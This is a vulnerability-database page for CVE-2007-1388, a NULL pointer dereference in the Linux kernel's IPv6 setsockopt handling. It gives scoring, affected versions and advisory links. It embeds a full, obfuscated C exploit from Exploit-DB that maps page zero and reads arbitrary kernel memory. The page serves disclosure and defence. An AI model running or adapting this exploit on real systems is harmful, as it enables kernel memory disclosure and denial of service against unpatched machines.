CVE-2007-1388 : Detail

CVE-2007-1388

0.04%V3
Local
2007-03-10
18h00 +00:00
2017-10-09
22h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The do_ipv6_setsockopt function in net/ipv6/ipv6_sockglue.c in Linux kernel before 2.6.20, and possibly other versions, allows local users to cause a denial of service (oops) by calling setsockopt with the IPV6_RTHDR option name and possibly a zero option length or invalid option value, which triggers a NULL pointer dereference.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.4 AV:L/AC:M/Au:S/C:N/I:N/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 29781

Publication date : 2007-03-25 22h00 +00:00
Author : Joey Mengele
EDB Verified : Yes

/* source: https://www.securityfocus.com/bid/23142/info The Linux kernel is prone to a NULL-pointer dereference vulnerability. A local attacker can exploit this issue to crash the affected application, denying service to legitimate users. The attacker may also be able to execute arbitrary code with elevated privileges, but this has not been confirmed. */ __ ip2.c __ // advanced exploit code for catastrophic kernel bug by Joey Mengele, professional hacker // user, to dump 0xaddress from kernel memory: ./ip2 0xaddress #include <sys/signal.h> typedef int fg8; #include <sys/mman.h> typedef long _l36; #include <string.h> typedef long * jayn9124; #include <stdio.h> typedef char * anal; #include <netinet/in.h> #define __exit main #define __main exit typedef void pleb; #include <stdlib.h> fg8 ___hh(fg8,_l36,jayn9124); #include <unistd.h> pleb _zzy(); # define __f4 setsockopt # define __f5 getsockopt fg8 __exit(fg8 argc, anal *argv[]) { _l36 tmp; fg8 s; _l36 hud; if (argc!=2) __main(-1); if (1 != sscanf(argv[1]," 0x%x",&hud)) __main(-1); signal(SIGSEGV,&exit); s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP); _zzy(); __f4(s, IPPROTO_IPV6, 6, (void *)NULL, 0); ___hh(s,hud,&tmp); printf("Kernel memory @ %.8x contains %.8x\n",hud,tmp); return 0; } int ___hh(int bf,_l36 _rtg,jayn9124 rape) { fg8 ot=4; *(jayn9124)(0x8) = _rtg; return __f5(bf,IPPROTO_IPV6,59,(void *)rape,&ot); } void _zzy() { _l36 *gol = NULL; if( (gol = mmap( (void *)NULL, 4096, PROT_READ|PROT_WRITE, MAP_FIXED |MAP_ANONYMOUS | MAP_PRIVATE, 0, 0 )) == (void *) -1 ) {perror( "mmap" );exit(412);} } __ ip2.c EOF __

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version To (including) 2.6.19.7

Linux>>Linux_kernel >> Version 2.6.0

Linux>>Linux_kernel >> Version 2.6.1

Linux>>Linux_kernel >> Version 2.6.2

Linux>>Linux_kernel >> Version 2.6.10

Linux>>Linux_kernel >> Version 2.6.11

Linux>>Linux_kernel >> Version 2.6.11.1

Linux>>Linux_kernel >> Version 2.6.11.2

Linux>>Linux_kernel >> Version 2.6.11.3

Linux>>Linux_kernel >> Version 2.6.11.4

Linux>>Linux_kernel >> Version 2.6.11.5

Linux>>Linux_kernel >> Version 2.6.11.6

Linux>>Linux_kernel >> Version 2.6.11.7

Linux>>Linux_kernel >> Version 2.6.11.8

Linux>>Linux_kernel >> Version 2.6.11.9

Linux>>Linux_kernel >> Version 2.6.11.10

Linux>>Linux_kernel >> Version 2.6.11.11

Linux>>Linux_kernel >> Version 2.6.11.12

Linux>>Linux_kernel >> Version 2.6.12

Linux>>Linux_kernel >> Version 2.6.12.1

Linux>>Linux_kernel >> Version 2.6.12.2

Linux>>Linux_kernel >> Version 2.6.12.3

Linux>>Linux_kernel >> Version 2.6.12.4

Linux>>Linux_kernel >> Version 2.6.12.5

Linux>>Linux_kernel >> Version 2.6.12.6

Linux>>Linux_kernel >> Version 2.6.13

Linux>>Linux_kernel >> Version 2.6.13.1

Linux>>Linux_kernel >> Version 2.6.13.2

Linux>>Linux_kernel >> Version 2.6.13.3

Linux>>Linux_kernel >> Version 2.6.13.4

Linux>>Linux_kernel >> Version 2.6.13.5

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14.1

Linux>>Linux_kernel >> Version 2.6.14.2

Linux>>Linux_kernel >> Version 2.6.14.3

Linux>>Linux_kernel >> Version 2.6.14.4

Linux>>Linux_kernel >> Version 2.6.14.5

Linux>>Linux_kernel >> Version 2.6.14.6

Linux>>Linux_kernel >> Version 2.6.14.7

Linux>>Linux_kernel >> Version 2.6.15

Linux>>Linux_kernel >> Version 2.6.15.1

Linux>>Linux_kernel >> Version 2.6.15.2

Linux>>Linux_kernel >> Version 2.6.15.3

Linux>>Linux_kernel >> Version 2.6.15.4

Linux>>Linux_kernel >> Version 2.6.15.5

Linux>>Linux_kernel >> Version 2.6.15.6

Linux>>Linux_kernel >> Version 2.6.15.7

Linux>>Linux_kernel >> Version 2.6.16

Linux>>Linux_kernel >> Version 2.6.16.1

Linux>>Linux_kernel >> Version 2.6.16.2

Linux>>Linux_kernel >> Version 2.6.16.3

Linux>>Linux_kernel >> Version 2.6.16.4

Linux>>Linux_kernel >> Version 2.6.16.5

Linux>>Linux_kernel >> Version 2.6.16.6

Linux>>Linux_kernel >> Version 2.6.16.7

Linux>>Linux_kernel >> Version 2.6.16.8

Linux>>Linux_kernel >> Version 2.6.16.9

Linux>>Linux_kernel >> Version 2.6.16.10

Linux>>Linux_kernel >> Version 2.6.16.11

Linux>>Linux_kernel >> Version 2.6.16.12

Linux>>Linux_kernel >> Version 2.6.16.13

Linux>>Linux_kernel >> Version 2.6.16.14

Linux>>Linux_kernel >> Version 2.6.16.15

Linux>>Linux_kernel >> Version 2.6.16.16

Linux>>Linux_kernel >> Version 2.6.16.17

Linux>>Linux_kernel >> Version 2.6.16.18

Linux>>Linux_kernel >> Version 2.6.16.19

Linux>>Linux_kernel >> Version 2.6.16.20

Linux>>Linux_kernel >> Version 2.6.16.21

Linux>>Linux_kernel >> Version 2.6.16.22

Linux>>Linux_kernel >> Version 2.6.16.23

Linux>>Linux_kernel >> Version 2.6.16.24

Linux>>Linux_kernel >> Version 2.6.16.25

Linux>>Linux_kernel >> Version 2.6.16.26

Linux>>Linux_kernel >> Version 2.6.16.27

Linux>>Linux_kernel >> Version 2.6.16.28

Linux>>Linux_kernel >> Version 2.6.16.29

Linux>>Linux_kernel >> Version 2.6.16.30

Linux>>Linux_kernel >> Version 2.6.16.31

Linux>>Linux_kernel >> Version 2.6.16.32

Linux>>Linux_kernel >> Version 2.6.16.33

Linux>>Linux_kernel >> Version 2.6.16.34

Linux>>Linux_kernel >> Version 2.6.16.35

Linux>>Linux_kernel >> Version 2.6.16.36

Linux>>Linux_kernel >> Version 2.6.16.37

Linux>>Linux_kernel >> Version 2.6.16.38

Linux>>Linux_kernel >> Version 2.6.16.39

Linux>>Linux_kernel >> Version 2.6.16.40

Linux>>Linux_kernel >> Version 2.6.16.41

Linux>>Linux_kernel >> Version 2.6.16.42

Linux>>Linux_kernel >> Version 2.6.16.43

Linux>>Linux_kernel >> Version 2.6.16.44

Linux>>Linux_kernel >> Version 2.6.16.45

Linux>>Linux_kernel >> Version 2.6.16.46

Linux>>Linux_kernel >> Version 2.6.16.47

Linux>>Linux_kernel >> Version 2.6.16.48

Linux>>Linux_kernel >> Version 2.6.16.49

Linux>>Linux_kernel >> Version 2.6.16.50

Linux>>Linux_kernel >> Version 2.6.16.51

Linux>>Linux_kernel >> Version 2.6.16.52

Linux>>Linux_kernel >> Version 2.6.16.53

Linux>>Linux_kernel >> Version 2.6.16.54

Linux>>Linux_kernel >> Version 2.6.16.55

Linux>>Linux_kernel >> Version 2.6.16.56

Linux>>Linux_kernel >> Version 2.6.16.57

Linux>>Linux_kernel >> Version 2.6.16.58

Linux>>Linux_kernel >> Version 2.6.16.59

Linux>>Linux_kernel >> Version 2.6.16.60

Linux>>Linux_kernel >> Version 2.6.16.61

Linux>>Linux_kernel >> Version 2.6.16.62

Linux>>Linux_kernel >> Version 2.6.17

Linux>>Linux_kernel >> Version 2.6.17.1

Linux>>Linux_kernel >> Version 2.6.17.2

Linux>>Linux_kernel >> Version 2.6.17.3

Linux>>Linux_kernel >> Version 2.6.17.4

Linux>>Linux_kernel >> Version 2.6.17.5

Linux>>Linux_kernel >> Version 2.6.17.6

Linux>>Linux_kernel >> Version 2.6.17.7

Linux>>Linux_kernel >> Version 2.6.17.8

Linux>>Linux_kernel >> Version 2.6.17.9

Linux>>Linux_kernel >> Version 2.6.17.10

Linux>>Linux_kernel >> Version 2.6.17.11

Linux>>Linux_kernel >> Version 2.6.17.12

Linux>>Linux_kernel >> Version 2.6.17.13

Linux>>Linux_kernel >> Version 2.6.17.14

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18.1

Linux>>Linux_kernel >> Version 2.6.18.2

Linux>>Linux_kernel >> Version 2.6.18.3

Linux>>Linux_kernel >> Version 2.6.18.4

Linux>>Linux_kernel >> Version 2.6.18.5

Linux>>Linux_kernel >> Version 2.6.18.6

Linux>>Linux_kernel >> Version 2.6.18.7

Linux>>Linux_kernel >> Version 2.6.18.8

Linux>>Linux_kernel >> Version 2.6.19

Linux>>Linux_kernel >> Version 2.6.19.1

Linux>>Linux_kernel >> Version 2.6.19.2

Linux>>Linux_kernel >> Version 2.6.19.3

Linux>>Linux_kernel >> Version 2.6.19.4

Linux>>Linux_kernel >> Version 2.6.19.5

Linux>>Linux_kernel >> Version 2.6.19.6

References

http://www.ubuntu.com/usn/usn-464-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.vupen.com/english/advisories/2007/1122
Tags : vdb-entry, x_refsource_VUPEN
http://www.securityfocus.com/bid/23142
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/24901
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.mandriva.com/security/advisories?name=MDKSA-2007:078
Tags : vendor-advisory, x_refsource_MANDRIVA
http://secunia.com/advisories/24777
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/25099
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2007-0169.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/25080
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/25392
Tags : third-party-advisory, x_refsource_SECUNIA